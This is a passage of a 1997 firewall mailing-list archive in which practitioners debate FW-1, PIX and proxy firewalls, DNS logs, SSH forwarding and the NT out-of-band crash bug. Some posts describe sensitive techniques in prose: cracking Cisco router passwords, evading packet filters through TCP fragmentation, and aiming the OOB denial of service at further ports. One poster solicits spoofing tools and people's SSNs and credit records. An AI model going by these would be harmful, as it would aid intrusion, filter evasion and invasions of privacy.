FW1 is installed. > > >=20 > > > J=FCri > > >=20 > > >=20 > >=20 > >=20 From owner-firewalls-outgoing Fri Jun 6 03:44:00 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA20259 for firewalls-outgoing; Thu, 5 Jun 1997 19:13:09 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA20224 for ; Thu, 5 Jun 1997 19:12:58 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id TAA10617 for ; Thu, 5 Jun 1997 19:20:26 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA23601; Thu, 5 Jun 97 19:18:43 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id TAA13786 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 5 Jun 1997 19:17:38 -0700 (PDT) Message-Id: <199706060217.TAA13786@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 795ED84F44DAAEF7882564AE000D0505; Thu, 5 Jun 97 19:17:36 EDT To: "Steve Rudolph" Cc: "David Harvey-George" , firewalls From: Ryan Russell/SYBASE Date: 5 Jun 97 19:24:08 EDT Subject: Re: FW-1 and IP Forwarding on NT Box X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Retrieving and/or resetting the Cisco password is fairly trivial if there is a console port on that card.. haven't used the card version, but I've done it on real 2500's many times. Search the Cisco web site for "password recovery." If they've turned on password encryption, you can either change the password, or do a web search for Cisco password crackers, I've seen a couple. Haven't tried those. Ryan ---------- Previous Message ---------- To: david, firewalls cc: From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp Date: 06/05/97 08:26:39 AM Subject: Re: FW-1 and IP Forwarding on NT Box David and group.... I have already got this running. Thank you to all who responed to my inquiry. I have learned alot just from the replys. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machines network. Now I just need to krak the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise call MCI Webmaker. This was a combination Port filter router and proxy server. As it turns out Intel programed the software (proxy), and configured the router. Vanstar installed the os (NT), and none of the above are able to get me the router password. Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ). I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a pc card) in terminal mode within 60 seconds. And then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of Dos 5.0 or an old hard drive anywhere with a dos based terminal program. Ths whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call. Thanks again Steve Rudoph http://www.datacommcorp.com srudolph@datacommcorp.com http://www.rude-dog.com http://www.rust.net/~stever stever@rust.net ---------- > From: David Harvey-George > To: Steve Rudolph ; firewalls@greatcircle.com > Subject: Re: FW-1 and IP Forwarding on NT Box > Date: Wednesday, June 04, 1997 7:14 PM > > > > I followed all of microsoft's reccomendations. > > Possibly a bad move. > > > Two nic cards a and b > > Sounds like the start of a stand-up comedy routine > > > > > A is set with default gateway of b > > and b is set with gateway of a > > it is! > > Okay, look, the system with the two cards knows how to route to each > network. All you've gotta do is set up the default gateway for > workstations on network A (NIC A) and the default gateway for workstations > on network B (NIC B). Don't touch anything on the router if your network > really is this simple (e.g. no other routes). If you have other routes > then use the route command directly. > > > Workstations can ping a and b > > Workstations cannot ping network b > > Ip forwarding is enabled and my route print matches exactly the format of > > microsofts reccomendations. > > > > I really need to get this up and running. I would get you the route > print, > > but I cannot get the addresses to copy onto the clip board..duh :) > > Yeah, I think you better send us the output from netstat on both the > 'router' and the workstations. > > Run netstat -rn from a DoZ window, click on the little Doz icon at the left > of the title bar, select edit/mark, mark the stuff you want to send, copy > it and paste it. > > David From owner-firewalls-outgoing Fri Jun 6 03:50:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25483 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:06 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25411 for ; Fri, 6 Jun 1997 00:50:40 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26106; Fri, 6 Jun 1997 09:52:14 +0200 (METDST) Message-Id: <3.0.32.19970606094942.006e0a64@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 06 Jun 1997 09:54:51 +0000 To: Craig Brozefsky , Bill Stout From: Eric Vyncke Subject: RE: PIX and Firewall-1 Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Craig, Cannot resist to reply :-) Beware that I'm working for Cisco Systems ;-) At 10:47 5/06/97 -0500, Craig Brozefsky wrote: >On Wed, 4 Jun 1997, Bill Stout wrote: > >> Peter Carlson writes.... >> >in whatway are application level gateways more secure than, say, FW-1 or PIX? >> >There are certainly capabilities that can be provided via application >> >proxies that can't be provided by any filter-based technologies, but what >> >types of attacks are a FW-1 or a PIX vulnerable to that application >> >proxies aren't? > >You should check should out comp.security.firewalls for a good >discussion of these issues. PIX is a NAT capable router with a few >filtering rules thrown in, such things are hardly safe, architecturally, >and implementation wise. NAT is NOT, I repeat NOT! a security tool, and >should not be treated as a part of your security infrastructure. Nearly >all NAT tools are not designed with security in mind. > I both agree and disagree: 1) NAT is NOT a security feature, I agree thus 200% with you 2) but I agree at 0% with you when you say that PIX is just a NAT router with rules. - PIX is not a router at all, it is not based on our IOS router software - PIX is able to NAT but is not limited to NAT - PIX is very strong due to its fullstate inspection against attacks for IP, TCP, ... protocols: SYN flooding, IP spoofing, TCP/IP session hijakcing, ... It also randomized the TCP sequence numbers of the TCP sessions going through it - PIX knows about the internal of some protocols (from ICMP, to RealAudio via HTTP) and is able to check / react on these protocols - ... I'm stopping now because it is coming too commercial on a technical list. But, once again: the PIX is a secure and performent component of most security architecture. [snip...] Best regards Eric Eric Vyncke Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 04:02:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA03779 for firewalls-outgoing; Fri, 6 Jun 1997 01:34:23 -0700 (PDT) Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA03732 for ; Fri, 6 Jun 1997 01:34:10 -0700 (PDT) Received: by h01.scientia.com with SMTP id JAA03645; Fri, 6 Jun 1997 09:38:13 +0100 Message-Id: <199706060838.JAA03645@h01.scientia.com> X-Sender: firewall@pop-server X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 06 Jun 1997 09:37:27 +0100 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Unknown log entry... Cc: devin@TELERAMA.LM.COM"Tod McQuillin, as Technical Contact for zone LM.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 19:05 05/06/97 -0700, Cihan Subasi wrote: >I had those two line in my firewall logs, can anybody explain me what >are they??? > >-------------------------------------------------- >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME" >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for >"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa" >-------------------------------------------------- Your mail server has tried to do a reverse lookup on IP address 208.196.3.66 (karnov.lm.com) and has got some VERY odd results. Reverse lookup on IP address ... is done by looking domain ....in-addr.arpa. This should contain PTR (name->IP) records. However if you look up 208.196.3.66 you get:- CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa" CNAME records are name->name (alias) records. This is wierd for an in-addr.arpa domain and it has not surprisingly confused your firewall. If you follow up the (I think non-sensical CNAME) you get. PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com" I have no idea why this DNS is set-up this. Ian From owner-firewalls-outgoing Fri Jun 6 04:46:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA25369 for firewalls-outgoing; Fri, 6 Jun 1997 03:28:09 -0700 (PDT) Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA23520 for ; Fri, 6 Jun 1997 03:18:52 -0700 (PDT) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.4/8.8.4) with ESMTP id DAA25165; Fri, 6 Jun 1997 03:22:37 -0700 (PDT) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id DAA16305; Fri, 6 Jun 1997 03:22:36 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id DAA07719; Fri, 6 Jun 1997 03:22:34 -0700 (PDT) From: Don Lewis Message-Id: <199706061022.DAA07719@salsa.gv.tsc.tdk.com> Date: Fri, 6 Jun 1997 03:22:34 -0700 In-Reply-To: Cy Ardoin "Re: PIX and FW-1 (packet filter Question)" (Jun 5, 2:11pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Cy Ardoin , "Jonathan M. Bresler" Subject: Re: PIX and FW-1 (packet filter Question) Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jun 5, 2:11pm, Cy Ardoin wrote: } Subject: Re: PIX and FW-1 (packet filter Question) } On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: } } > } > >I don't think there is anything an application firewall can } > >do that can't also be done by a "packet filter" firewall. The } > } > trivial example: } > a smtp application level proxy can disable the "debug" command } > for every sendmail behind that firewall. } } Finding and removing the "debug" command from smtp connections at the } packet layer isn't much different than finding and altering the PORT and } PASV part of the FTP command and all the NAT style packet filters } modify the FTP commands. It's not something packet filters do, but } it is no more difficult than many of the things they already do. What if each character in "debug" is sent in a separate TCP segment? What if the segments are sent out of order? What if "debug" is part of one TCP segment that is fragmented with overlapping fragments such that you don't see "debug" until the fragments are reassembled in a certain way? And don't forget, you need to keep track of the entire state of the SMTP connection, so that you don't drop the connection because "debug" is in the text of the message. The reassmbly and reordering is done by the TCP stack in an application proxy firewall, so the application proxy and the destination mail server will see the same cleaned-up datastream. I seem to recall that the FW-1 ftp command stream rewriting broke if the packet boundaries happened to occur in inconvenient places (I believe they fixed this a while ago). If you're just relying on your firewall to rewrite your ftp commands, then about the worst thing a hostile ftp client could do is just not work. If you're relying on your firewall to sanitize incoming data streams, then any failures to accurately track the connection state could result in a security breach. In principle, a stateful packet filter and an application proxy can do the same thing, but it would take a very large number of states to duplicate what the network stack does with input packets. Even if your packet filter implements an equivalent state machine, there is the danger that the destination host works in an unexpected way that still leaves it vulnerable. Probably the easiest and safest thing for the packet filter can do is to throw away fragmented packets and out of order TCP segments, but I suspect that violates some of the "should" and "must" clauses in the RFCs. --- Truck From owner-firewalls-outgoing Fri Jun 6 05:01:01 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA02834 for firewalls-outgoing; Fri, 6 Jun 1997 03:56:48 -0700 (PDT) Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA02796 for ; Fri, 6 Jun 1997 03:56:34 -0700 (PDT) Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id LG9HY3VF; Fri, 6 Jun 1997 13:04:17 +0200 Message-ID: <3397EF0A.68E1@iponet.es> Date: Fri, 06 Jun 1997 13:05:46 +0200 From: Cristina Ceballos Reply-To: cceballos@src.siemens.es Organization: Siemens Redes Corporativas X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: SecuRemote on FireWall-1 3.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I am trying to use Securemote to access the internal network from the internet in an encryted manner. In order to do that I have to install the securemote client on the PC accessing my network from the Internet and also, on the servers side, Securemote is implemented on top of a Firewall-1 Virtual Private network. My questions are: Is a Virtual Private Network just an object (network type) I have to define???? Do I need to have a Certified Key in order to be able to use this encryption???? (I shoundt..) If anyone is using SecureRemote I would appreciate your help. Thans. Cristina Ceballos -- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: INAS 1.0.2 mQCNAjNfHNsAAAEEAMDAXftbeYZEfqRDRLJSxoMRoWjizoY+0sIh4FvrNkrW4A5Y qEdpPJhwT7nIRQX5iI0HFSWUjYCNwUqvloiWZHJ1aCZpv6exfYthOcnEoRLnu9Vp sXEpZ8XT4iQMM9QTeRlDvtlHYbtVJal9bSK5bs+62Z9Kcp3Tj0I7PxDU55yBAAMF tCxDcmlzdGluYSBDZWJhbGxvcyA8Y2NlYmFsbG9zQHNyYy5zaWVtZW5zLmVzPokA lQIFEDNfHNtCOz8Q1OecgQEBVW4D/AgekAW+MxDk6VAWJOW3ZaYGggQVnH2kPZGP Ox0t7TKrfsMhQItYLfQCjQl3/PQ4rCRUv3g0mcSa4ctXB21mNVkI0B3s9iVM59p1 cvQMUnmdVqkBVoslMuktqnfTIVSCY0FvFFAN5QhK4fN89LOpqleg509CrRQhrlVB 5c2YKtKk =tBjV -----END PGP PUBLIC KEY BLOCK----- From owner-firewalls-outgoing Fri Jun 6 05:52:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA21243 for firewalls-outgoing; Thu, 5 Jun 1997 16:39:52 -0700 (PDT) Received: from pctb.industryone.net ([208.135.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA21204 for ; Thu, 5 Jun 1997 16:39:40 -0700 (PDT) Received: from [206.114.39.33] by pctb.industryone.net (SMTPD32-3.03) id AEF765C011E; Thu, 05 Jun 1997 19:42:47 -0400 Message-ID: <339FE10D.7AB3@Who.net> Date: Thu, 12 Jun 1997 07:44:13 -0400 From: -= TaLoN =- Reply-To: Talon@Who.net Organization: CVI SOFTWARE X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: IP SPOOFING Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Okay, I'm pretty new to invesitgative services with Internet Service Providers but what I'm mainly interested in would be information related with Faking / SPoofing IP Addresses & Network Nodes. If anyone out there has any information related to that or even information or software which allows to do that. Please send it to me at Talon@who.net . Also, looking for assistance in finding information on people. (i.e. SSN, CREDIT RECORDS, ETC.) please email me AS SOON as you get any information. Thanks! Once Again, please email me : Talon@mail.org Jason Burton - Certified Network Investigator Vector Classified Section From owner-firewalls-outgoing Fri Jun 6 05:58:36 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA13382 for firewalls-outgoing; Thu, 5 Jun 1997 18:37:38 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA13328 for ; Thu, 5 Jun 1997 18:37:18 -0700 (PDT) Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id VAA24079 for ; Thu, 5 Jun 1997 21:40:46 -0400 (EDT) Message-Id: <199706060140.VAA24079@mail.clark.net> Comments: Authenticated sender is From: "Marcus J. Ranum" Organization: Network Flight Recorder, Inc. To: Firewalls@GreatCircle.COM Date: Thu, 5 Jun 1997 21:39:18 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Fortezza's Fate?? Reply-to: mjr@clark.net In-reply-to: <199706051957.MAA15686@honor.greatcircle.com> X-mailer: Pegasus Mail for Win32 (v2.53/R1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There are a lot of rumors buzzing around DC these days to the > effect that NSA and the Joint Chiefs have tossed in the towel and will, > within weeks, approve DoD purchases for non-Fortezza security systems, for > both strong authentication Wow!! I bet that's gonna really do wonders for all your Security Dynamics stock options, Vin! Congrats!! mjr. ----- Marcus J. Ranum, CEO, Network Flight Recorder, Inc. Personal Work New Book!! From owner-firewalls-outgoing Fri Jun 6 06:01:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA08832 for firewalls-outgoing; Fri, 6 Jun 1997 04:27:57 -0700 (PDT) Received: from namsa.nato.int (ddnfw0.namsa.nato.int [147.36.201.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA01385 for ; Fri, 6 Jun 1997 03:48:44 -0700 (PDT) Received: by ddnfw0.namsa.nato.int id <17033-1>; Fri, 6 Jun 1997 12:53:12 +0100 Message-Id: <97Jun6.125312gmt+0100.17033-1@ddnfw0.namsa.nato.int> Date: Fri, 6 Jun 1997 11:53:36 +0100 From: Thierry GUINET X-Mailer: Mozilla 3.0 (X11; I; HP-UX A.09.05 9000/735) Mime-Version: 1.0 To: Robert Sthlbrand Cc: firewalls@GreatCircle.COM Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts References: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert St=E5hlbrand wrote: > = > What is the problem here??? > Of course (as Mike Hedlund says) is a NT-machine (win95 and win3.11 as > well) only vulnerable to the OOB-bug on port 139 (netbios) and I REALLY= I hope I'm doing a false assertion, but I think your wrong, I read that some tests have been done, using urgent flag against port 80 and that it worked just fine :( I don't have the paper under the eyes but if you're interrested I can dig into my archives. Thierry -- = Thierry Guinet = T.Guinet@namsa.nato.int Phone: +352/30.63-6812 Fax: +352/30.87.21 In order to create an apple pie from scratch, you must first create the universe. Carl Sagan From owner-firewalls-outgoing Fri Jun 6 06:01:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA18424 for firewalls-outgoing; Thu, 5 Jun 1997 19:03:12 -0700 (PDT) Received: from m4.nassau.cv.net (m4.nassau.cv.net [167.206.32.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA18360 for ; Thu, 5 Jun 1997 19:02:51 -0700 (PDT) Received: from m5.nassau.cv.net by m4.nassau.cv.net with ESMTP (1.40.112.8/16.2) id AA199602806; Thu, 5 Jun 1997 22:06:46 -0400 Received: from nassau.cv.net.nassau.cv.net ([10.4.55.84]) by m5.nassau.cv.net with SMTP (1.40.112.8/16.2) id AA191992804; Thu, 5 Jun 1997 22:06:44 -0400 Message-Id: <3.0.1.16.19970605220043.356f0950@mail-hub> X-Sender: kgunther@mail-hub X-Mailer: Windows Eudora Light Version 3.0.1 (16) Date: Thu, 05 Jun 1997 22:00:43 -0400 To: firewalls@GreatCircle.COM From: Ken Gunther Subject: Does Winframe need a firewall? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are currently using Winframe by Citrix to give remote users access to applications at our datacenter. Access to the Winframe box is through the IBM Global Network (IGN). IGN is a subscribers only network. It is not as open as the Internet but by no means do we have control over who is on it. We currently have a firewall in front of the Winframe box but there is a noticable delay in keystrokes when going through the firewall (TIS Toolkit on a Linux box). We have performed some tests where for short periods of time the Winframe box was connected directly to the IGN and the keystroke delays went away. Is Winframe safe to put directly on the untrusted network? We are worried about unauthorized people getting through to the trusted side as well as denial of service attacks where people try to crash Winframe. Ken (kgunther@nassau.cv.net) From owner-firewalls-outgoing Fri Jun 6 06:54:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25482 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:03 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25385 for ; Fri, 6 Jun 1997 00:50:35 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26103; Fri, 6 Jun 1997 09:52:11 +0200 (METDST) Message-Id: <3.0.32.19970606094235.006df76c@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 06 Jun 1997 09:54:48 +0000 To: Matt Eide , "'firewalls@GreatCircle.COM'" From: Eric Vyncke Subject: RE: PIX and Firewall-1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:47 5/06/97 -0500, Matt Eide wrote: >Application proxies monitor commands sent at the application layer, and >reconstruct packets so that IP attacks can't be sent beyond the firewall. >(From what I understand), State-based (a.k.a. enhanced extended packet >filter) security devices inspect the first packet that comes across with >enhanced extended filtering rules and can include additional authentication. >If that packet passes all filtering rules, remaining packets of that session >are passed through without inspection. As I'm working with Cisco, I can only speak for the PIX (but I guess FW-1 behaves roughly the same). Full-state inspection means that ALL packets are inspected to check against the maximum of checks: sequence numbers, ports, ... For some protocols like HTTP, VDO, ... the PIX evens understand the protocol specification and is able to act on layer 7 data (like URL logging, disabling java applets, ...). Do not confuse this normal behaviour with the in-band 'strong' authentication called 'cut-through proxy'. In this case, for some protocols (Telnet, FTP and HTTP), the PIX is able to challenge the client USER for 'strong' authentication. This challenge occurs in the first data packet with respect of the protocol, then, after authentication and if the USER is authorized, the rest of the data packets are allowed to flow through the PIX but still with full-state inspection. Just my 0.25 BEF Eric > >I would like to add that Firewall-1 can be set to continue monitoring all the packets of an established session and will check them against the rule base. > >Later, > >Matt >Meide@sybronint.com > Eric Vyncke Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 06:51:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA12697 for firewalls-outgoing; Thu, 5 Jun 1997 18:32:53 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA12615 for ; Thu, 5 Jun 1997 18:32:33 -0700 (PDT) Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id SAA21387 for ; Thu, 5 Jun 1997 18:38:50 -0700 (PDT) Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id SAA01939 ; Thu, 5 Jun 1997 18:34:54 -0700 From: girsch@marben.com (Arnaud Girsch) Message-Id: <199706060134.SAA01939@mail.marben.com> Subject: Re: ssh proxy for fwtk To: benedikt@devnull.ruhr.de (Benedikt Stockebrand) Date: Thu, 5 Jun 1997 18:34:53 -0700 (PDT) Cc: girsch@marben.com, pnash@hanshan.bbnplanet.com, don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@GreatCircle.COM, ylo@cs.hut.fi In-Reply-To: <87k9kbfz28.fsf@devnull.ruhr.de> from "Benedikt Stockebrand" at Jun 3, 97 06:09:35 pm X-Organization: Marben Products, Inc. / DSET Corporation X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > girsch@marben.com (Arnaud Girsch) writes: > >> For example, you probably restrict X because you think that X is never secure >> and can be abused, etc ... Giving access to X within a ssh tunnel protects >> against most of the X problems, so why not giving X access then ? > > I'm not sure, but what about this one: If the remote machine has been > hacked, then X forwarding can be more of a problem than help. If the > remote sshd (or /bin/*sh or whatever) has been modified to use that X > forwarding they're just about right in your local machine. And you > can't even tell because you'd need your local users private key to > decrypt things to analyze them. > > Anyone know more about this? > In any case, SSH is based on a double trust of both hosts. If one of the hosts is compromised, you might be exposed to brakeins. Arnaud. -- Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/ From owner-firewalls-outgoing Fri Jun 6 06:59:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01383 for firewalls-outgoing; Thu, 5 Jun 1997 08:51:24 -0700 (PDT) Received: from gargoyle.clark.net (pm2-112.dcwt.infi.net [208.136.65.112]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA01365 for ; Thu, 5 Jun 1997 08:51:16 -0700 (PDT) Received: (qmail 6337 invoked by uid 500); 5 Jun 1997 15:58:17 -0000 Date: Thu, 5 Jun 1997 11:58:17 -0400 (EDT) From: "Paul D. Robertson" X-Sender: proberts@gargoyle To: Daniel Strawson cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Daniel Strawson wrote: > Hang on a moment. > > Let me put this in perspective. > > As I understand it, this problem results from sending packets with a > particular IP option set in the header. (Please confirm I'm right here > someone). That's only a part of the problem (OOB), the follow-up attacks (Son of OOB), besides setting the options differently, also include negotiating an invalid TCP window size, which it seems NT disregards the sequence numbers in, and happily sets the window, then can't use it. > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > crash, you get the NT system that it is running on to crash, so it is not > an insecurity, but a claimed feature that doesn't work. That's a Denial of Service attack, and certainly is an insecurity. The bastion host shouldn't be vulnerable to attacks such as this. If FW1 were an application layer gateway, then passing it off as an OS bug would be more acceptable (and woe on ye that chose an insecure platform). With FW1 examining each packet anyway, the onus should be on protecting itself as well. > So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. or - FW1 happily removes the options from packets it forwards, but not those destined for itself. (Have you tested through FW1 as well?) Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From owner-firewalls-outgoing Fri Jun 6 07:26:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23224 for firewalls-outgoing; Thu, 5 Jun 1997 07:46:57 -0700 (PDT) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23168 for ; Thu, 5 Jun 1997 07:46:37 -0700 (PDT) Received: from uucp3.UU.NET by relay5.UU.NET with SMTP (peer crosschecked as: uucp3.UU.NET [192.48.96.34]) id QQcsqd21242; Thu, 5 Jun 1997 10:49:26 -0400 (EDT) Received: from fmrco.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Thu, 5 Jun 1997 10:49:18 -0400 Received: from ocean.fmrco.com by fmrco.com (4.1/SMI-4.1) id AA09308; Thu, 5 Jun 97 10:37:23 EDT Received: from capstan.devonshire (capstan.fmrco.com) by ocean.fmrco.com (4.1/SMI-4.1) id AA09844; Thu, 5 Jun 97 10:37:24 EDT Received: from capstan by capstan.devonshire (SMI-8.6/SMI-SVR4) id KAA09421; Thu, 5 Jun 1997 10:36:47 -0400 Date: Thu, 5 Jun 1997 10:36:47 -0400 (EDT) From: Andrew Luca Reply-To: Andrew Luca Subject: RE: Solaris To: ocean!uunet!libofmich.lib.mi.us!amyc@uunet.uu.net, ocean!uunet!monarch.rnb.com!kempster@uunet.uu.net Cc: ocean!uunet!GreatCircle.COM!firewalls@uunet.uu.net Message-Id: Mime-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-Md5: gcsYUDAqiU4JB2T47qQ0sA== X-Mailer: dtmail 1.2.0 CDE Version 1.2_22 SunOS 5.6 sun4u sparc Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Some of the Solaris kernel can get unhappy if you are tweaking like this since supernetting is not officially supported under 2.5.x. However, in Solaris 2.6 it is. If you can wait for a couple of months, 2.6 is a real winner. The second beta seems to be quite stable and feature rich. Drew > Comments: 